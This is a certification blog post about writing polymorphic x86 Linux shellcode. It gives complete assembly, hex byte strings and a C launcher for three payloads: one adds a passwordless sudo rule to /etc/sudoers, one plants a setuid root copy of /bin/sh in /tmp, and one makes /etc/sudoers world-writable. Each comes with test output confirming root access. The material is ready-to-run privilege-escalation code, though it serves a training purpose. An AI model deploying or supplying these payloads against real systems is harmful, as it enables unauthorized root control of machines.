Linux x86 Polymorphic Shellcode

The next assignment for the SLAE is taking existing shellcode from shell-storm or exploit-db and making polymorphic versions for three of them.

edit /etc/sudoers with ALL ALL=(ALL) NOPASSWD: ALL

The first shellcode I decided to tackle polymorphism on is shellcode for adding ALL ALL=(ALL) NOPASSWD: ALL to /etc/sudoers. Original shellcode can be found here:

http://shell-storm.org/shellcode/files/shellcode-62.php

To better understand the shellcode I decided to put it through a debugger and to my surprise the shellcode actually doesn’t work at all. This is because the original shellcode doesn’t clear out registers in preparation of the syscalls.

In GDB below after the MOV dl, 0x1c instruction is called:

[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x3 
ECX: 0xbffff5fc ("ALL ALL=(ALL) NOPASSWD: ALL\n")
EDX: 0xb7fbf81c --> 0x0 
ESI: 0x0 
EDI: 0x0 
EBP: 0xbffff658 --> 0x0 
ESP: 0xbffff5fc ("ALL ALL=(ALL) NOPASSWD: ALL\n")
EIP: 0x804a088 --> 0x80cd04b0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804a07f <code+63>:	push   0x204c4c41
   0x804a084 <code+68>:	mov    ecx,esp
   0x804a086 <code+70>:	mov    dl,0x1c
=> 0x804a088 <code+72>:	mov    al,0x4
   0x804a08a <code+74>:	int    0x80
   0x804a08c <code+76>:	mov    al,0x6
   0x804a08e <code+78>:	int    0x80
   0x804a090 <code+80>:	xor    ebx,ebx

You can see that EDX contains more than just 0x1c which causes the write() to fail.

The exit call suffers the same issue after doing a MOV al, 0x1.

[----------------------------------registers-----------------------------------]
EAX: 0xffffff01 
EBX: 0x0 
ECX: 0xbffff5fc ("ALL ALL=(ALL) NOPASSWD: ALL\n")
EDX: 0xb7fbf81c --> 0x0 
ESI: 0x0 
EDI: 0x0 
EBP: 0xbffff658 --> 0x0 
ESP: 0xbffff5fc ("ALL ALL=(ALL) NOPASSWD: ALL\n")
EIP: 0x804a094 --> 0x80cd
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804a08e <code+78>:	int    0x80
   0x804a090 <code+80>:	xor    ebx,ebx
   0x804a092 <code+82>:	mov    al,0x1
=> 0x804a094 <code+84>:	int    0x80
   0x804a096 <code+86>:	add    BYTE PTR [eax],al
   0x804a098:	add    BYTE PTR [eax],al
   0x804a09a:	add    BYTE PTR [eax],al
   0x804a09c:	add    BYTE PTR [eax],al

We can see EAX is populated 0xffffff01 which results in a seg fault when the interrupt is ran.

So all in all, the shellcode is fairly useless.

For the polymorphic and working version of the shellcode I’ve used the JMP CALL POP technique for getting the string to be written on the stack. The shellcode is also register independent, null free, and smaller than the original that didn’t work (decreased from 86 bytes to 79 bytes).

My shellcode has also been published to Exploit-DB here: https://www.exploit-db.com/exploits/44507/

global _start

section .text

_start:

	xor edx, edx		; clear edx
	xor ecx, ecx		; clear ecx
	push edx		; terminating NULL
	push 0x7372656f 	; "sreo"
	push 0x6475732f		; "dus/"
	push 0x6374652f		; "cte/"
	mov ebx, esp		; point ebx to stack
	inc ecx			; ecx to 1
	mov ch, 0x4		; ecx to 401 O_WRONLY | O_APPEND
	push 0x5		; open()
	pop eax			
	int 0x80		; execute open
	xchg ebx, eax		; save fd in ebx
	
	jmp short setup

	
write:

	pop ecx			; pop "ALL ALL=(ALL) NOPASSWD: ALL"
	mov dl, 0x1c		; len 28
	push 0x4		; write()
	pop eax		
	int 0x80		; execute write

	push 0x1		; exit ()
	pop eax
	int 0x80
	
setup:
    call write
    db "ALL ALL=(ALL) NOPASSWD: ALL" , 0xa

Let’s test by compiling and extracting the shellcode.

root@ubuntu:~/SLAE/assignments/6$ ./compile.sh editsudoers_jmp
[+] Assembling with Nasm ... 
[+] Linking ...
[+] Done!
root@ubuntu:~/SLAE/assignments/6# for i in $(objdump -d editsudoers_jmp |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo
\x31\xd2\x31\xc9\x52\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\x6a\x05\x58\xcd\x80\x93\xeb\x0d\x59\xb2\x1c\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80\xe8\xee\xff\xff\xff\x41\x4c\x4c\x20\x41\x4c\x4c\x3d\x28\x41\x4c\x4c\x29\x20\x4e\x4f\x50\x41\x53\x53\x57\x44\x3a\x20\x41\x4c\x4c\x0a

C wrapper:

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xd2\x31\xc9\x52\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\x6a\x05\x58\xcd\x80\x93\xeb\x0d\x59\xb2\x1c\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80\xe8\xee\xff\xff\xff\x41\x4c\x4c\x20\x41\x4c\x4c\x3d\x28\x41\x4c\x4c\x29\x20\x4e\x4f\x50\x41\x53\x53\x57\x44\x3a\x20\x41\x4c\x4c\x0a";
main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}

Compile without stack protection.

root@ubuntu:~/SLAE/assignments/6# gcc shellcode.c -o shellcode -fno-stack-protector -z execstack

And finally test.

root@ubuntu:~/SLAE/assignments/6# ./shellcode
Shellcode Length:  79
root@ubuntu:~/SLAE/assignments/6# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
ALL ALL=(ALL) NOPASSWD: ALL

We can see the file has been successfully appended, so we should be able to sudo now without a password. Let’s test with our non-root user.

absolomb@ubuntu:~$ sudo bash
root@ubuntu:~#

Perfect!

cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh

The next shellcode on the menu is shellcode that copies /bin/sh into /tmp and sets the setuid bit on it.

Original shellcode here: http://shell-storm.org/shellcode/files/shellcode-540.php

I decided to start from scratch here and simplify things significantly in comparison to the original shellcode. Once again the JMP CALL POP technique was used, but this time for getting the commmand to be ran onto the stack. Original shellcode for this one was 126 bytes, mine accomplishes the same thing at 74 bytes.

My shellcode has also been published to Exploit-DB here: https://www.exploit-db.com/exploits/44510/

global _start			

section .text
_start:

	push 0xb		; execve()		
	pop eax			;
	cdq    			; set edx to 0
	push edx		; NULL
	push word 0x632d	; "c-"	
	mov edi,esp		; point edi to stack
	push edx		; NULL
	push 0x68732f2f		; "hs//"
	push 0x6e69622f		; "/bin"
	mov ebx,esp		; point ebx to stack
	push edx		; NULL

	jmp short cmd

execute:

	push edi		; "c-"
	push ebx		; "/bin/sh"
	mov ecx,esp		; point to stack
	int 0x80		; execute execve


cmd:
	call execute
	db "cp /bin/sh /tmp/sh; chmod +s /tmp/sh"

Compile and test.

absolomb@ubuntu:~/SLAE/assignments/6$ ./compile.sh execve
[+] Assembling with Nasm ... 
[+] Linking ...
[+] Done!
absolomb@ubuntu:~/SLAE/assignments/6$ for i in $(objdump -d execve |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo
\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x63\x70\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b\x73\x20\x2f\x74\x6d\x70\x2f\x73\x68

Place shellcode in a C wrapper (same as above) and compile with GCC.

absolomb@ubuntu:~/SLAE/assignments/6$ gcc setuid.c -o setuid -fno-stack-protector -z execstack

Now run to test.

absolomb@ubuntu:~/SLAE/assignments/6$ sudo ./setuid
Shellcode Length:  74
absolomb@ubuntu:~/SLAE/assignments/6$ ls -al /tmp
total 144
drwxrwxrwt  7 root     root       4096 Apr 20 10:08 .
drwxr-xr-x 22 root     root       4096 Mar 19 16:33 ..
-rw-------  1 absolomb absolomb      0 Apr 20 06:28 config-err-o7e65E
drwxrwxrwt  2 root     root       4096 Apr 20 06:28 .ICE-unix
-rwsr-sr-x  1 root     absolomb 112204 Apr 20 10:09 sh
-rw-rw-r--  1 absolomb absolomb      0 Apr 20 06:28 unity_support_test.0
drwx------  2 absolomb absolomb   4096 Apr 20 06:28 vmware-absolomb
drwxrwxrwt  2 root     root       4096 Apr 20 06:28 VMwareDnD
drwx------  2 root     root       4096 Apr 20 06:57 vmware-root
-r--r--r--  1 root     root         11 Apr 20 06:28 .X0-lock
drwxrwxrwt  2 root     root       4096 Apr 20 06:28 .X11-unix

Our shell is indeed in /tmp with a root setuid.

absolomb@ubuntu:~/SLAE/assignments/6$ id
uid=1000(absolomb) gid=1000(absolomb) groups=1000(absolomb),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
absolomb@ubuntu:~/SLAE/assignments/6$ /tmp/sh
# id
uid=1000(absolomb) gid=1000(absolomb) euid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),1000(absolomb)

Success!

chmod 777 /etc/sudoers

For the last shellcode I decided to tackle something a little smaller and just made minor tweaks to the existing shellcode found here:

https://www.exploit-db.com/exploits/43463/

The original shellcode was at 36 bytes and I reduced it down to 33 bytes by removing XOR instructions and replacing with CDQ and by PUSH and POPs to accomplish the same thing.

global _start
 
section .text
 
_start:
 
    cdq			; edx to 0
    push edx		; terminating NULL
    push 0x7372656f	; 'sreo'
    push 0x6475732f	; 'dus/'
    push 0x6374652f	; 'cte/'
    mov ebx, esp	; point ebx to stack
    mov cx, 0x1ff	; 777
    push 0xf		; chmod()
    pop eax		
    int 0x80		; execute chmod()
    push 0x1		; exit()
    pop eax
    int 0x80		; execute exit()

Let’s compile and test (you know the drill by now).

absolomb@ubuntu:~/SLAE/assignments/6$ ./compile.sh chmod
[+] Assembling with Nasm ... 
[+] Linking ...
[+] Done!
absolomb@ubuntu:~/SLAE/assignments/6$ for i in $(objdump -d chmod |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo
\x99\x52\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\xff\x01\x6a\x0f\x58\xcd\x80\x6a\x01\x58\xcd\x80
absolomb@ubuntu:~/SLAE/assignments/6$ vim shellcode.c
absolomb@ubuntu:~/SLAE/assignments/6$ gcc shellcode.c -o shellcode -fno-stack-protector -z execstack
absolomb@ubuntu:~/SLAE/assignments/6$ sudo ./shellcode
Shellcode Length:  33
absolomb@ubuntu:~/SLAE/assignments/6$ ls -al /etc/sudoers
-rwxrwxrwx 1 root root 745 Feb 10  2014 /etc/sudoers

All done!

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1208

Github Repo: https://github.com/absolomb/SLAE